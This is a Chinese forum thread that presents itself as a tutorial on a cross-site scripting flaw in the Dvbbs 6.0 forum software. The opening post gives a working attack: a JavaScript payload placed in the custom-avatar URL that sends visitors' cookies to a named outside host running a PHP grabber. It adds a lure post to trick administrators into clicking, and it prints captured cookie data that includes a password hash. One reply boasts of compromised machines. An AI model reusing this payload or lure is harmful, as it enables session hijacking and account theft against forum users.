返回列表 发帖

[教程]动网论坛6.0存在跨战脚本漏洞

动网论坛(动网先锋论坛) 是一款由ASPSKY.NET开发和维护的源代码开?..最高版本为DVBBS VER 6.0.0 SP3。 ◇此漏洞所涉及版本:: 目前所有版本 ◇描述: 由于没有对自定义头像的地址进行过滤,导致远程攻击者可以在自定义头像的地址中插入一段特殊代码。使恶意用户能够取得浏览网页用户的cookie信息。 ◇具体分析与利用: 1. 分析: 关键的问题就出在MYMODIFY.ASP中,看看MYMODIFY.ASP的源代码,没有对自定义头像的地址进行滤。 javascript, jscript:, js:, about; value, document., onmouse,onexit都应该做严格过滤。这可能是开发者的因为疏忽造成的。 2.利用 目的:取得用户的cookie信息 首先我们要有一个空间,可以是支持ASP或者PHP的。 以下是获取cookie的php源代码: 如果得到cookie,则在空间中生成mood.txt,为了不引起怀疑,将自动把网页转换到http://mood.18.to 把它上传到支持php的空间上。比如这里我把它传到 http://yanren.com/mood.php 然后注册一个用户(强烈建议大家注册英文用户,如baobaoguai) 我们在“关于自定义头像”中插入如下代码: java script:window.open('http://yanren.com/mood.php?'+documents.cookie) 然后提交,现在这个的头像已经成了一段偷cookie的特殊代码。现在回到首页,看看在线成员列表,点我们刚才注册的用户,看,它弹出了两个窗口,一个是关于mood这个用户的资料,另一个则是http://mood.18.to aspsky=usercookies=1&userid=6621&tempid=&userhidden=2&password=965eb72c92a549dd&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=%B9%D4%B1%A6%B1%A6111;%20ASPSESSIONIDCACARBQD=KFHGEADBKLHJGLDDBFEGCJCH;%20Longker+Union=lao=1;%20iscookies=0;%20BoardList=BoardID=Show;%20upNum=0;%20aspsky=userid=6621&usercookies=1&userhidden=&password=965eb72c92a549dd&tempid=&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=%B9%D4%B1%A6%B1%A6111 哇哇,所有的cookie全都得到了。只不过经过了加密。 想得到别人的cookie,容易,我们把关于baobaoguai的资料地址复制一下。到论坛发个帖,比如标题是“管理员大人和各位用户快来看,我发现了好东西”,一般人都会点这个联接,而且URL是那个网站的,不会引起别人的怀疑。当他用的鼠标轻轻的点一下这个URL时,我们就窃取了他的cookie,并把他带到了我的主页,这叫玩黑广告两不误~~哈哈 http://yanren.com/mood.rar php写的原代码文件

[教程]动网论坛6.0存在跨战脚本漏洞

我试试啊

TOP

[教程]动网论坛6.0存在跨战脚本漏洞

没几个人看的懂.......
可悲。。。

TOP

[教程]动网论坛6.0存在跨战脚本漏洞


    肉鸡都搞了好几个了。

TOP

[教程]动网论坛6.0存在跨战脚本漏洞

就是啊
什么也看不懂,没有几个人看的懂的

TOP

返回列表 回复 发帖